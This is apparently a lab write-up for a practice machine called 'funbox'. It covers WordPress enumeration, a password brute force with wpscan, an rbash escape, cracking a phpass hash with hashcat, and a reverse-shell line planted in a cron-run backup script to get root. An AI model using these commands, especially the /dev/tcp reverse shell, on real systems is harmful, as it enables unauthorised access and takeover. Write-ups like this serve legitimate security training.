
NETWORK


ENUMERATION
Visiting fritz.box redirects us to funbox.fritz.box




FOOTHOLD
WpScan
wpscan --url http://funbox.fritz.box --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token XXX

A brute force with the following command
wpscan --url http://funbox.fritz.box --disable-tls-checks -U joe -P /usr/share/wordlists/rockyou.txt
has revealed the following

SSH access as joe
Using the password found in the previous step we can get access to machine via ssh

Escape Rbash
Joe ssh is a limited rbash session

But we can bypass rbash limitation using "bash --noprofile"
as seen here https://gist.github.com/PSJoshi/04c0e239ac7b486efb3420db4086e290

PRIV ESCALATION
Database enumeration
looking into the configuration of the Wordpress website




Using the following hashcat command, we have cracked the user funny password
/opt/hashcat/hashcat -m 400 -a 0 '$P$BGUPID16QexYI9XRblG9k8rnr0TMJN1' /opt/rockyou/rockyou.txt

Using this password, we get access to the Wordpress admin section as user admin

Unfortunately, we couldn’t get root via this route
Exploiting backup.sh
While in Joe account, we have found few messages between the machine users

Looking into the user Funny account, we have found the following files


A message in the file .reminder.sh tells us that the file .backup.sh is being call via cron

Because, we have writing permissions on the .backup.sh we have added a reverse shell into this script
bash -c 'bash -i >& /dev/tcp/192.168.49.90/1234 0>&1'

Waiting for the cron to trigger, we then get root access on the machine
